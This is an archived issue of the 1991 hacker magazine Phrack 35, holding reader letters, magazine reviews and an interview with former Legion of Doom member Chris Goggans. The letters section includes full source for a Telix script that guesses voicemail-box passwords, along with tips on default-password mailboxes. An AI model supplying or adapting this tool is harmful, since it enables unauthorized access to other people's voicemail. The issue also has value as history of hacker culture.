Phrack #35

EDB-ID:

42846

CVE:

N/A

Author:

phrack

Type:

papers

Platform:

Magazine

Published:

1991-11-17

                               ==Phrack Inc.==

                Volume Three, Issue Thirty-five, File 1 of 13

                               Issue XXXV Index
                              __________________

                               P H R A C K  3 5

                               November 17,1991
                              __________________

                             ~Don't Tread on Me!~

     Phrack Inc. is going great!  In fact so great that we already have enough
material for the next two issues including the long-awaited sequel to Phrack 13
(the infamous joke issue released on April 1, 1987), Diet Phrack!  That issue
which will be number 36 is scheduled for release next month and will mark the
end of Volume 3.  If you have anything that is somewhat humorous, send it over
to us at Phrack as soon as possible so we can include it.

     Phrack Inc. celebrates its sixth birthday with the release of this issue.
Exactly six years ago, sitting in front of an IBM PC known as Metal Shop
Private, were Taran King and Knight Lightning releasing a soon to be famous
publication called Phrack Inc.  That first issue wasn't much, a small
collection of eight files sent across the country to bulletin boards at 1200
baud.  Six years is quite a long time in the hacker underground.  Today we send
Phrack to thousands of people at hundreds of Internet sites spanning the entire
world.  Phrack has become more than a magazine, it truly is an institution.
Long Live Phrack!

     Pay close attention to Phrack World News this issue for details on HoHo/
XMAScon and many other stories with serious ramifications to our way of life.

     Special thanks to Twisted Pair (for the help in a jam), Amadeus, The
Butler, and Black Kat for the great files.  Thanks to the Great Gatsby, just
because he is cool.  It's people like you that keeps this magazine comming out
so frequently.

     This month we have had a ton of letters for Phrack Loopback.  If your
letter or question did not appear, we are sorry that it has to wait one more
issue!  The last issue really got some administrators (or wanna-be admins)
steamed at us.  Check out Phrack Loopback and PWN Quicknotes for details.

Your Editors,

                  Crimson Death and Dispater
                   phrack@stormking.com


Submissions: phrack@stormking.com
FTP Distribution: cs.widener.edu or eff.org

______________________________________________________________________________

                         Phrack XXXV Table of Contents
                         =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

 1. Introduction to Phrack 34 by Crimson Death and Dispater
 2. Phrack Loopback by Phrack Staff
 3. Phrack Profile of Chris Goggans by S. Leonard Spitz
 4. Telenet/Sprintnet's PC Pursuit Outdial Directory by Amadeus
 5. Sting Operations by Sovereign Immunity
 6. Social Security Numbers & Privacy by Chris Hibbert of CPSR
 7. Users Guide to VAX/VMS Part 1 of 3 by Black Kat
 8. A Beginners Guide to Novell Netware 386 by The Butler
 9. Auto-Answer It by Twisted Pair
10. PWN/Part 1 by Dispater
11. PWN/Part 2 by Dispater
12. PWN/Part 3 by Dispater
13. PWN/Part 4 by Dispater
______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                Volume Three, Issue Thirty-five, File 2 of 13

                          [-=:< Phrack Loopback >:=-]

                                By Phrack Staff

     Phrack Loopback is a forum for you, the reader, to ask questions, air
problems, and talk about what ever topic you would like to discuss.  This is
also the place The Phrack Staff will make suggestions to you by reviewing
various items of note; magazines, software, catalogs, hardware, etc.
______________________________________________________________________________

What's on Your Mind
~~~~~~~~~~~~~~~~~~

:: Hacking VMB's ::

From: Mr. Upsetter
To: phracksub@stormking.com
Subject: Phrack 34 VMB article

The article in Phrack 34 on voice mail hacking by Night Ranger was really good.
It reminded me of some experiences I had with a cellular voice mail system a
couple years ago in San Diego.  I would bet there are similar systems in other
cities.

These VMB's would automatically answer calls when the subscriber wasn't on the
air.  They worked just like standard VMB's.  To access the box, the owner could
dial his or her own cellular number, then hit * when it answered.  Then the VMB
would ask for a password.

Guess what the default password was?  None!  That meant all you had to do was
dial up a cellular VMB and hit *, and you were in.  How many VMB's still had
the default password?  About half...

To scan for cellular VMB's all you had to do was dial numbers in the cellular
prefix.  It was pretty fun...almost too easy.

Cheers,
Mr. Upsetter

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

>From: Zoso Puda
>
>After reading PHRACK 34 I thought it was good. Especially the article on VMB
>hacking. As a matter of fact I wrote a SALT script to help me do it.

     This is exactly what we like to see.  People actually getting basic
information and building on it.

-  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -

                    +-------------------------------------+
                    |      ZoSoft Telix VMB Hacker        |
                    |                                     |
                    |       written by: Zoso Puda         |
                    +-------------------------------------+
First words
-----------
   After reading Night Ranger's article (see PHRACK 34), I decided to make a
VMB hacking program. Night Ranger provided good insight into how to hack VMB
systems but some VMBs are hard to crack. What I came up with is a program to
help me hack some of the harder systems. The ones that don't use the defaults
are tough. Also my phone has the buttons and earpiece in one unit and I had to
dial then put the phone to my ear and listen, look at the buttons to dial a
number and put the phone back to my ear to listen. It soon became tiresome.

   What I finally came up with was a program to let me run all the phone
functions from the keyboard. My modem speaker is loud enough to hear clearly so
it seemed like the perfect thing to do. I also automated certain features like
incrementing the password or box number. The program is not fully automated
however. You must run this program manually. It's main purpose is to allow you
to run normal phone functions via the keyboard. If you cannot hear clearly
through your modem speaker then pick up the phone after the program dials the
VMB phone # and hang up the phone before hanging up the modem.

   What follows is a brief description on how to use the program, compile the
program, and run the program. A working knowledge of VMB systems is expected.

Parameter details
-----------------
  VMB phone number : If you don't know this, give it up.

  Setup sequence : This code is used for systems that require a '9' or '#' or
                   '*' to be pressed before the box number. Up to 3 characters
                   can be in this string.

  Valid Box #      : This would be a known valid box or the box you will
                     be attempting to hack. This value remains constant.

  Codefile filename: You may use a file to get 'default' or your favorite
                     passwords from. You must include the extension.

  Starting box/code: Box # or code to start checking. This value will
                     increase automatically upon pressing [F7].

Using the function keys
-----------------------
                [F1]    Dials the VMB system (see params).
                [F2]    Hangs-up the modem.
                [F3]    Closes the current codefile.(see params).
                [F4]    Lets you set the current code/box #.
                [F5]    Dials the Setup sequence (see params).
                [F6]    Dials the current code.
                [F7]    Makes the next code current.
                [F8]    Dials the valid box (see params).
                [F9]    Allows you to re-set the parameters.
                [F10]   Hangs-up and quits the program.
                [0 - 9] These keys will dial 0 - 9 respectively.
                [*, #]  These keys will dial * and #.
                [/]     Used as a substitute # for the keypad.

Basic Insructions
-----------------
Codefiles should be stored in the same directory as your Telix program.

A sample codefile should look like this:

1111
2222
3333
etc...

I suggest you make seperate codefiles for the number of digits in each code.
For example, all 3 digit codes should be in a file called 3DIGIT.COD, or
something similar.

During parameter entry, if you enter a codefile and it exists, you will NOT
be prompted for a 'Starting box/code'. When the codefile is finished, the
current code will set itself to 1000.

If you enter a blank for the codefile or the name you entered doesn't exist
then you will be prompted for a 'Starting Box/Code'.

Compiling
---------
 Save the program within the 'CUT HERE' lines as VMBHACK.SLT. Copy the file
 VMBHACK.SLT into the directory where your Telix scripts are. Compile using
 CS.EXE. (example: CS VMBHACK.SLT) To run the program, load Telix and press
 Alt-G followed by the program name (VMBHACK).

//---------------------------<CUT HERE>-------------------------------------
//                   ZoSoft VMB Hacker Version 1.4
//                    Code by: Zoso, November 1991
//
//           See PHRACK 34 for more information on VMB systems.
//
// NOTE: Do not remove the credits of the original author, modified versions
//       you may add credits, but please do not remove any.
//
str code[10],                           // Global Variables
    codes[10],
    reset[1],
    vmb_number[15],
    borc[1],
    valid[10],
    setup[3];
str filename[12],
    fstatus[10];
int f;
int fflag = 0;
init_modem()                            // Modem initialization
{
cputs("AT X3 S6=0 S7=0 S11=105 M1 L3"); // X must be 3, L is Loudness on
cputs("^M");                            // some modems, you may have to
waitfor("OK",20);                       // alter this. See you modem
manual.
}
vmb_dial(str string)                    // Dial function
{
str workstr[20];
workstr = string;
strcat(workstr,";");
cputs("ATDT");
cputs(workstr);
cputs("^M");
cputs("^M");
}
hang_up()                               // Hang Up function
{
hangup();
waitfor("",20);
cputs("ATH0");
cputs("^M");
cputs("^M");
clear_scr();
display();
}
next_code()                             // Next code function
{
int cd;
if (fflag)
   {
    if (not feof(f))                    // Check for file first
       {
        fgets(code,10,f);
        return;
       }
    if (feof(f))
       {
        file_close();
        code = "999";
        goto NEXTCODE;
       }
   }
NEXTCODE:
cd = stoi(code);
cd = cd + 1;                            // This line determines how the
code
itos(cd,code);                          // gets incremented.
}
set_code()                              // Enter new code
{
gotoxy(65,2);
gets(code,10);
}
parameters()                            // Set parameters
{
str c[1];
file_close();
GETINFO:
clear_scr();
printsc("VMB Hacker Parameters^M^J");
printsc("^M^JVMB phone number    :");
gets(vmb_number,15);
printsc("^M^JSetup sequence      :");
gets(setup,3);
printsc("^M^JValid box #         :");
gets(valid,10);
printsc("^M^JCodefile filename   :");
gets(filename,12);
if (filename != "")
   {
    open_file();
    next_code();
   }
if (not fflag)
   {
    filename = "N/A";
    printsc("^M^JStarting box/code   :");
    gets(code,10);
   }
printsc("^M^J^M^JCorrect? (Y/n):");
gets(c,1);
if (c == "n" || c == "N")
    goto GETINFO;
}
press_enter()                           // Pause routine
{
str a[1];
pstraxy("Press [ENTER] to continue...",20,23,11);
gets(a,1);
}
title_scr()                             // Title screen
{
str i[1];
TITLE:
clear_scr();
pstraxy("  - ZoSoft VMB Hacker V1.4 -",20,4,11);
pstraxy("written for Telix by: Zoso Puda",20,6,14);
press_enter();
}
display()                               // Display screen
{
box(0,0,78,3,4,0,19); box(0,0,78,5,4,0,19);
pstraxy("[ ZoSoft VMB Hacker V1.4 ]",25,0,31);
pstraxy("VMB Number:",4,2,31);          // Information display
pstraxy(vmb_number,16,2,27);
pstraxy("Valid #:",33,2,31);
pstraxy(valid,42,2,27);
pstraxy("Current:",57,2,31);
pstraxy(code,66,2,27);
pstraxy("Codefile:",6,4,31);
pstraxy(filename,16,4,27);
pstraxy("File status:",29,4,31);
pstraxy(fstatus,42,4,27);
pstraxy("Setup sequence:",50,4,31);
pstraxy(setup,66,4,27);
box(0,6,78,10,4,0,103);                 // Function key display
pstraxy("[           ]",30,6,111);
pstraxy(" 0 - 9,*,#",31,6,110);
pstraxy("[  ] Dial VMB", 2,7,111);
pstraxy("F1", 3,7,110);
pstraxy("[  ] Hang up",22,7,111);
pstraxy("F2",23,7,110);
pstraxy("[  ] Close file",42,7,111);
pstraxy("F3",43,7,110);
pstraxy("[  ] Set Current",61,7,111);
pstraxy("F4",62,7,110);
pstraxy("[  ] Setup seq.",2,8,111);
pstraxy("F5", 3,8,110);
pstraxy("[  ] Dial current",22,8,111);
pstraxy("F6",23,8,110);
pstraxy("[  ] Next box/code",42,8,111);
pstraxy("F7",43,8,110);
pstraxy("[  ] Valid box",61,8,111);
pstraxy("F8",62,8,110);
pstraxy("[  ] Parameters",22,9,111);
pstraxy("F9",23,9,110);
pstraxy("[   ] QUIT",41,9,111);
pstraxy("F10",42,9,110);
gotoxy(0,11);
}
quit_vmb()                              // End program
{
file_close();
hangup();
waitfor("",20);
clear_scr();
printsc("Thanks for using ZoSoft's VMB Hacker.^M^J^M^J");
cputs_tr(_mdm_init_str);                // Restore modem params
}
open_file()                             // Open Codefile
{
fflag = 1;
f = fopen(filename,"r");
fstatus = "OPEN";
if (ferror(f))
    file_close();
}
file_close()                            // Close Codefile
{
fflag = 0;
fclose(f);
fstatus = "CLOSED";
}
main()                                  // MAIN program module
{
int chr;
title_scr();
parameters();
clear_scr();
display();
init_modem();
TOP:
gotoxy(0,11);
chr = inkeyw();
if (chr == '0')    vmb_dial("0");       // Dial 0-9
if (chr == '1')    vmb_dial("1");
if (chr == '2')    vmb_dial("2");
if (chr == '3')    vmb_dial("3");
if (chr == '4')    vmb_dial("4");
if (chr == '5')    vmb_dial("5");
if (chr == '6')    vmb_dial("6");
if (chr == '7')    vmb_dial("7");
if (chr == '8')    vmb_dial("8");
if (chr == '9')    vmb_dial("9");
if (chr == '#')    vmb_dial("#");       // Pound sign (#)
if (chr == '/')    vmb_dial("#");       // Make (/) same as (#) for keypad
if (chr == '*')    vmb_dial("*");       // Asterisk (*)
if (chr == 15104)                       // F1
    vmb_dial(vmb_number);
if (chr == 15360)                       // F2
    hang_up();
if (chr == 15616)                       // F3
   {
    file_close();
    display();
   }
if (chr == 15872)                       // F4
   {
    set_code();
    display();
   }
if (chr == 16128)                       // F5
    vmb_dial(setup);
if (chr == 16384)                       // F6
    vmb_dial(code);
if (chr == 16640)                       // F7
   {
    next_code();
    display();
   }
if (chr == 16896)                       // F8
    vmb_dial(valid);
if (chr == 17152)                       // F9
   {
    hang_up();
    parameters();
    display();
   }
if (chr == 17408)                       // F10
   {
    quit_vmb();
    goto END;
   }
goto TOP;
END:
prints("^M^J");
}
//---------------------------<CUT HERE>---------------------

______________________________________________________________________________

:: More Legal Stuff ::

>From: "Michael Lawrie, Operations" <MICHAEL@hicom.loughborough.ac.uk>
>Subject: RE: Who/What is this?
>
>In this country, the receipt of documents like this would probably be
>pretty helpful in sending a person down on a conspiracy to contravene
>a section or more of the Computer Misuse Act, I do not appreciate crap
>like this appearing on my machine but since you didn't send it me, I
>can't really moan at you - What I would appreciate though is if you
>told people that forwarding it to people who don't want it is probably
>not a good idea, unless you want all your list members locked up in
>some pokey British gaol that is!
>
>Michael Lawrie.
>---
>Michael Lawrie, Hicom Group Security           <security@uk.ac.lut.hicom>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Sir,
     You will have to excuse my ignorance of telecom laws in other countries.
In the United States, distribution of technical information such as Phrack Inc.
is protected by law.

     Hackers are not involved in conspiracies or plots.  Most hackers could
care less about politics.  Hackers are interested in the progression of
technology and learning about how our advanced society works.  The inefficient
structure known as government is the last thing most hackers are interested in
exploring.

     Phrack Inc. has no "membership."  Phrack Inc. is an electronically
distributed publication.  It is like any other security oriented newsletter.
Have you ever heard of "Computer Security Journal", "Computers and Security",
or "Computer Crime Digest?"  These are some of the "security industry"
publications that are read in the U.S.  Phrack Inc. merely has a little
different flavor to it.  If you are interested in seeing any of these printed
journals, I can forward their address to you.

     I am sorry if you received Phrack Inc. and didn't wish to read it.  You
might wish to take the matter up with the person that forwarded it to you.  I
hope it wasn't too big of an inconvenience for you to delete the mail message
containing Phrack Inc.

Cheers,

Dispater

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

     After a (as it turns out not so private) conversation with Torq, it seems
this guy isn't even an admin anywhere.  He just likes to pretend he is.  Did my
reply end this little debate?  NOT!  This person had the nerve to intercept my
private mail to Torq and then proceeded to bitch about it some more.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

>From MICHAEL@hicom.loughborough.ac.uk Sat Nov  9 09:45:53 1991
Date: Fri, 8 Nov 91 13:19 GMT
From: "Michael Lawrie, Operations" <MICHAEL@hicom.loughborough.ac.uk>
To: PHRACKSUB <<@nsfnet-relay.ac.uk:PHRACKSUB@STORMKING.com>>
Subject: The EFF.

I found the following message the other day, whilst routing around, I am to
assume you lied to me about taking him off the list but for now we'll forget
that.

> From phrack@gnu.ai.mit.edu Wed Oct 23 01:41:51 1991
> Date: Wed, 23 Oct 91 01:41:47 -0400
> From: phracksub@stormking.com
> Message-Id: <::::::::::::::::::::::>       
> To: torq@:::::::::::::::
> Subject: Phrack
>
> This guy sounds like a total idiot. If he does kill your account or something
> stupid, get a hold of the EFF.  They went to bat for someone who had their
> account revoked because he/she had issues of Phrack on their directory.
>
> people should get a clue....
>
> Dispater
> phracksub@stormking.com

As you say, people should get a clue. Are you assuming that 'torq' is perhaps
American and as such has his rights protected by constitution? He isn't, he is
British and doesn't really as such have much going for him. If I want to kill
his account I can do it at the bat of an eyelid, whilst him receiving 'Phrack'
is not breaking any laws because it does not show intent, it would be breaking
my machine's regulations if it came here. I would enjoy the EFF to come 'to
bat' for Torq if I revoke his account for having issues of Phrack in his
directory, Its a shame he hasn't. Does the EFF have any good lawyers in the UK
that you know of?

Regards...
  Michael.

---
Michael Lawrie, Operations Group, Systems Development and Security.
Mail: michael@uk.ac.lut.hicom                     (Span:19527::60478::lorry)
[What pretentious signature?]                     (Inet: lorry@mit.edu)


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

From: Dispater
To: MICHAEL@hicom.loughborough.ac.uk

        I never said I would delete him from the distribution list.  I don't
have to DO anything.  Who the hell are you pretending to be anyway?  You aren't
the admin of MIT's gnu machine.

>I found the following message the other day, whilst routing around, I am to
>assume you lied to me about taking him off the list but for now we'll forget
>that.

        Really?  What the hell were you doing prowling though someone else's
mail?  I assume you did it without Torq's permission.  I wonder if MIT would
like to hear that some British hacker is rummaging around their machine?  Your
"finding" of our private e-mail might place you in criminal violation of the
Electronic Communications Privacy Act of 1986.  This is a federal law in the
United States which protects the privacy of electronic communications.  Your
interception of our communications has violated our privacy.  How would you
like me to have a little chat with YOUR supervisor?

       Why you care about what takes place on the MIT computer which is located
here in the USA?  In this country freedom of speech is a right granted to all
its citizens.  The previous publisher of Phrack had to go to Federal Court to
prove it and he succeeded.  Phrack Inc. is 100% legal here and there is not one
damn thing you can do about it!

Dispater
______________________________________________________________________________

:: Hacker Philosophy ::

From: The Dark Lord Sarik Malthus
Organization: Underground Computing Foundation


>         I'm curious...now, don't think I am trying to judge you, or your
> actions, or anything...but I am wondering how you, in your mind, justify the
> actions of hackers and the kind of information provided by your magazine?

     I don't.  I think people spend too much time attempting to justify
their "morality."  I don't play that guilt trip.  I only seek information.
Information has no morality.  It is simple and pure, just like truth.

     I do feel that with knowledge comes responsibility not to use it in a
destructive way.  This is why I will not print "how to make bomb" files in
Phrack Inc.  Explosives are made for one thing and it doesn't involve too
much creativity.  People can get that type of stuff elsewhere.

     I have never damaged any system or hurt any individual financially.
Carding is unquestionable robbery.  If you know the person you are carding
from, that is revenge and is a different category, as far as I am concerned,
but it still doesn't make it right.  Besides, any poser with half a brain can
pull a CBI.  That doesn't demonstrate much talent to me.  I admit I went
through the c0deZ phase, but I moved onto better things.

     I guess your basic question may boil down to, "Why hack?"  I see the
internet and the telecom world in as the latest frontier to be explored.  If
you look back at how this country started, you will see that it was explored
by people who probably had a similar mentality to that of hackers.  We want
to test ourselves.  We want to have a broad range of different experiences in
our lives.  We are not content with ignorance of the unknown.  And, to some
extent we are sick of our current society's norms.  With that in mind we
leave the security of what is considered acceptable at times.

     I guess I have a lot of different unpopular views....oh well.
_______________________________________________________________________________

A Review of:
~~~~~~~~~~
Full Disclosure #23 - a publication For Truth, Justice, and The American Way
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Full Disclosure                              Subscription Rates:
P.O. Box 903-FD23                            U.S - 12 issues for $18.00
Libertyville  IL  60048                            24 issues for $29.95
                                             No Canadian orders, please!
by:Twisted Pair


     About a month ago I mailed in a coupon I got from friend in order to get a
sample issue of Full Disclosure.  Within a week I received Issue #23.  It's got
articles on fax interception, dumpster diving, computer security tips,
surveillance tips, technical stuff, mail surveillance, etc.

     The Fax Interception article was most interesting to me.  I've often
wondered just how easy it could be to intercept faxes.  Its all explained in
the article.  Here's some text from the article:

|                       False Sense of Security:
|
|   With the widespread proliferation of fax machines came increased use.
|   In general, a document transferred has been given the same sort of
|   validity as one sent or received by the U.S. Mail.*  In general, such
|   communications were originally secure.  Now that interception equipment is
|   available, the
|   sense of security has become false.

*Note:  Just this month, the FCC has stopped accepting paperwork with faxed
        signatures on them.  Their new policy states that they only accept
        original signatures.

     How could the average Phrack reader start intercepting faxes?  Use a
standard fax machine hooked up to someone's line?  Naaah.  Wouldn't work.  The
handshaking routine between the two corresponding fax machines would be screwed
all to hell if you threw a third machine into the mix.  Full Disclosure claims
to have successfully nabbed faxes with another method.  They've pointed out
this assertion with a photo on their front page of a "fax".  It was supposedly
intercepted from the FBI.  It shows a computer screen with an FBI "FAX" on it.
It looks more like the photo was made with some cutting and pasting at the
neighborhood PIP store.  Maybe they should have added the caption "Simulated
Picture" to their front page.

     They recommend using IBM PC fax boards to intercept faxes.  You'd need
"sophisticated" software that would ignore the handshaking sequences between
the two fax machines you're spying on.  The IBM would just save all the page
information and ignore the protocol information transmitted.

Back to the article....

|   Cellular phone-based fax machines provide ripe opportunity for "hacker"
|   intercepts, since the signal is available via low cost police scanners.*
|   No physical connection to a common carrier network is necessary.  There is
|   absolutely no risk of being detected.

*Note:  That should read MODIFIED police scanners.  See any of the ads in
        "Nuts & Volts" for a book on doing this.

     Discussed in the article is something called Broadband Interception.
Commercial fax interception equipment can be hooked up to monitor satellite
link traffic.  One unit can decode up to 150 simultaneous fax transmissions
from a 6,000 phone line satellite link.

     Next, all the consequences of forged faxes are discussed.  People have
become so reliant on fax technology that they incorrectly assume that anything
that "comes over the fax" must be legitimate.  Forgers find faxing much simpler
than trying to make a "real" document.  The trouble of altering postmarks and
signatures is bypassed.  All they need now is scissors and tape to make any
"legitimate-looking" document needed.  In their next issue, they further
discuss fax interception and all the implications of sending sensitive info by
fax.

|                         Fax Intercept Suppliers
|          (The sale and/or use of fax interception equipment may be
|                  restricted by State and Federal law)
|
|   Burlex International, Box 6094, Silver Springs MD 20906 (301) 460-4444;
|   Communications Devices,3510 Mountain Rd,Haymarket VA 22069 (703) 754-9316;
|   El-Tec Intl, 205 Van Buren St #220, Herndon VA 22080 (703) 709-9673;
|   [Many others listed]

Oh, here's an ad from Full Disclosure.  It's a business card run:
     ______________________________________________________
|   |                                                      |
|   | Unix Systems Specialists     Available July 10, 1992 |
|   |                                                      |
|   |               L  E  N       R  O  S  E               |
|   |                                                      |
|   |                  Convicted "Hacker"                  |
|   |                         and                          |
|   |                 Computer  Consultant                 |
|   |              799 Royal St. Geore  #105               |
|   |         Naperville, IL 60563  (708) 527-1293         |
|   |______________________________________________________|

     Since you might want to check out a copy of Full Disclosure for yourself,
I'll include their address and stuff.  The issue I had was 16 pages long,
half-newspaper size.
______________________________________________________________________________


A Review of TAP #105
~~~~~~~~~~~~~~~~~~~
TAP Magazine                                       Subscription Rates:
PO Box 20264                                       10 issues for $10.00
Louisville KY  40250-0264

by Dispater

     Around March of 1991 I mailed in my $10. for a subscription to TAP
Magazine.  Promoted as "the oldest hacker magazine" and "created by Abbie
Hoffman."  I still, to this day, have not received ONE issue for my money.

     While attending CyberView '91, I met Predat0r and gave him $5.00 for a few
back issues consisting of #97, #100 through issue #104.  I was later given a
complimentary issue of #105.  After asking about #98 & #99, Predat0r said that
he wasn't going to give those out because of some bullshit with Aristotle.
Whatever...I still don't see why we couldn't see it.

     Anyway, Issue #105 of TAP Magazine (June 1991) was nothing spectacular,
but it wasn't bad either.  The issue was 18 pages long.  For those of you who
have never seen it, TAP contains information on hacking and phreaking as well
as some political commentary.  The articles are always diverse and interesting.

     TAP #105 contained information about the DNA Box.  This is basically
cellular phone phreaking.  It was very good and quite detailed.  There were
also schematics of bugs and a flow chart explaining the incident initiation
sequence of the E-911 system.  This issue of TAP was sprinkled with some neat
advertisements and news clippings (as usual) and wrapped up with a file about
Blue Boxing.  The price of $10.00 for 10 issues is worth it, but read on...

     Last week I asked Predat0r what was going on with TAP magazine.  He told
me that he had the material for the next three issues, but his copier or some
other equipment was broken.  This is an excuse I have heard before.  Whether it
is a valid excuse or not, only he knows.  Since issue #105 (June) there has
been not one issue of TAP.  If you have ordered a subscription prior to July
and not received anything, I highly suggest you write to Predat0r.

     The material contained in TAP is good and very much worth the price.
(Especially compared to 2600 Magazine) However, I find that the general
management of TAP to be poor, at this time, and therefore I highly recommend
that you NOT send your $10 to TAP Magazine.  Considering the amount of
advertisements that we have all seen by TAP (in magazines such as Mondo 2000,
2600, etc.) in the past year, there is no excuse for the non-existent service
that has transpired.  Predat0r is a good sysop and needs to manage TAP as he
does his BBS.  I do urge you to call BLITZKREIG BBS (502) 499-8933 : NUP:
COLUMBIAN COKE.

     I really don't like to be so critical, but I know some people I've talked
to are feeling ripped off.  This is why I wrote this.  I truly hope that TAP
can get out of this slump.
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                Volume Three, Issue Thirty-five, File 3 of 13

                 -*[  P H R A C K  XXXV  P R O P H I L E  ]*-

                             -=>[  Presents  ]<=-      

                        Sincerely Yours, Chris Goggans
                        -===--===--===--===--===--===-
                             by S. Leonard Spitz
                             Associate Publisher
                          INFOSecurity Product News

"A provocative interview with a former member of the "Legion of Doom" suggests
that the ethics of hacking (or cracking) are often in the eye of the beholder."

Malicious hackers, even though most operate undercover, are often notorious for
the colorful pseudonyms they travel under.  Reformed hackers, however, prefer a
low profile so as to shed their image of perceived criminality.  Kevin Mitnick,
infamous for the DEC caper, is one of the foremost advocates of this strategy.

Now comes Chris Goggans, trailing his former "Legion of Doom" moniker, Erik
Bloodaxe, behind him, to try it his way.  Goggans insists that where once he
may have bent the rules, he is now ready to give something back to society.
And coming across with a high degree of sincerity, he affirms his intention to
try.  Are he and his colleagues, wearing their newly acquired information
security consultants hats, tilting at windmills, or does their embryonic,
cracker-breaking start-up, Comsec Data Security Co., stand a fighting chance?
We thought we would ask him.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

ISPNews: I am going to ask several legitimate questions.  Please answer them
          completely, truthfully, and honestly.

Chris Goggans:  OK.


JUDGEMENT BY THE MEDIA

ISPNews: Would you react to Computerworld's July 29 piece, "Group Dupes
          Security Experts," <also seen in Phrack World News issue 33, part 2
          as part of the article called "Legion of Doom Goes Corporate> in
          which members of your organization were accused of masquerading as
          potential customers to obtain information, proposals, and prices from
          other security consultants?

     CG: We were all amazed that something like that would ever be printed
          because, as we understand common business practices, we weren't doing
          anything unusual.

ISPNews:  Computerworld reported that the Legion of Doom was "one of the
          nation's most notorious hacker groups, according to federal law
          enforcers."  Can you respond to that?

     CG: Notorious is a relative term.  There has always been a shroud of
          mystery covering the Legion of Doom, because it was an organization
          whose membership was private.  When you keep people in the dark about
          the activities of something, there is always going to be the
          perception that more is going on than there really is.

ISPNews: Would you say then that the characterization of being notorious is
          unfair?

     CG: To some degree, yes.  There certainly was activity going on within
          the group that could be considered illegal.  But most of this was
          taking place when members of the group were all between the ages
          of 14 and 17.  While I don't want to blame immaturity, that's
          certainly a factor to be considered.

          The Legion of Doom put out four <issues of an> on-line electronic
          newsletter <called the Legion of Doom Technical Journals> composed
          of different files relating to various types of computer systems
          or netware.  They explained different operating systems or
          outlined different procedures used by networks.  They were always
          informative and explained how to use a computer.  We never said
          "This is a computer and this is how to break into it."

          Colorful names and words used to describe groups also add to
          notoriety.  If we had been the "Legion of Flower Pickers," the
          "Legion of Good Guys," or the "SuperFriends," there probably
          wouldn't be this dark cloud hanging over the group.

ISPNews:  Could you be charged with intent to provide information to others
          which would make it easier to gain unauthorized access?

     CG: I don't see how that could be a charge.  There's the first amendment.
          I maintain that talking about something and encouraging or forcing
          someone to do it are completely different.


EARNING AN "A" IN INFOSECURITY

ISPNews:  What attracted you to computer security?

     CG: The same thing that would attract anybody to being a hacker.  For
          half of my life I've been in front of a computer every day.
          Sometimes from early in the morning until the wee hours of the night.
          And my particular focus has been on computer security.

ISPNews:  At least the dark side of that coin.

     CG:  I wouldn't say the dark side.  I'd say the flip side.  If you do
          something for 11 years, you are going to pick up a lot of knowledge.
          And I've always wanted to find some kind of productive career that I
          thoroughly enjoyed.  So this was just an obvious progression.  No one
          wants to be a 40-year-old hacker living in fear of the Secret
          Service.

ISPNews: When you first applied to enter college, did you feel that it was the
          right place to learn about information security?

     CG: Yes, I thought it was the right place, mainly because college is the
          most obvious choice to pursue an education in any field.  I just
          assumed that I would be able to find formal training leading to
          certification or a degree in this field.  Yet, at the University of
          Texas, there wasn't anything along those lines.

ISPNews:  Did you graduate from the University of Texas?

     CG: No, I changed majors and then moved to Houston.  I had started out in
          computer science but it was completely unrelated to any kind of
          career I wanted to pursue.  I eventually changed my major to
          journalism.  There are only two things I like to do:  Work on
          computers, and write.  So, if I wasn't going to get a degree in one,
          it was going to be in the other.  I'm a semester away, and I do plan
          on finishing.

ISPNews:  If you were to structure a college curriculum for studies in
          information security, would you design it to focus on technical
          issues, ethics, business issues, or legal matters?

     CG: I would try to focus on all of these.  If you don't have a technical
          background, you can't understand the way the operating system works,
          and you really can't focus on some of the issues that need to be
          addressed with information security.

          Ethics certainly come into play ass well for obvious reasons.  I
          don't think hackers are going to go away.  Even with the advent of
          newer technology, there are always going to be people who have an
          interest in that technology and will learn how to manipulate it.


ETHICS, INTELLECTUAL PROPERTY RIGHTS, AND THE LAW

ISPNews:  What is your definition of a hacker?

     CG: A Hacker is someone who wants to find out everything that there is to
          know about the workings of a particular computer system, and will
          exhaust every means within his ability to do so.

ISPNews:  Would you also comment on the ethics of hacking?

     CG: There is an unwritten code of ethics that most people tend to adhere
          to.  It holds that: no one would ever cause damage to anything; and
          no one would use any information found for personal gain of any kind.

          For the most part, the only personal gain that I have ever seen from
          any sort of hacking activity is the moderate fame from letting others
          know about a particular deed.  And even in these cases, the total
          audience has been limited to just a few hundred.

ISPNews:  Are you unaware of hackers who have in fact accessed information,
          then sold it or massaged it for money?

     CG: No, certainly not.  I am just acknowledging and defining a code of
          ethics.  We of the Legion of Doom tried to adhere to that code of
          ethics.  For example, members of the original nine who acted
          unethically were removed from the group.

ISPNews:  Do you believe that penetrating a computer system without either
          making changes or removing information is ethical, or a least is not
          unethical?

     CG:  At one time in the past I may have held that belief, but now I
          certainly must not, because the whole idea of being involved in the
          formation of my new company, Comsec Data Security, would show
          otherwise.

ISPNews:  So today, you believe that unauthorized entry is unethical.

     CG:  Exactly.  As a hacker, I didn't particularly hold that.  But as
          things such as invasion of privacy, even though I never caused any
          damage, and breach of trust became more apparent to me, I was able to
          step back, see the picture, and realize it was wrong.

ISPNews:  Can I conclude that you are speaking for you company and its
          principals?

     CG:  Yes, I am speaking for all of the principals.

ISPNews:  What are your views on the ownership of information?

     CG:  I feel that proprietary information, national-security-related
          information, information that could be considered a trade secret, all
          definitely have ownership, and access should be restricted.

          In the past, I felt that information that affected me or had some
          relevance to my life should be available to me.  I felt that
          information should be available to the people it affected, whether
          that be phone company information, credit bureau information, banking
          information, or computer system information in general.  I am saying
          this in the past tense.

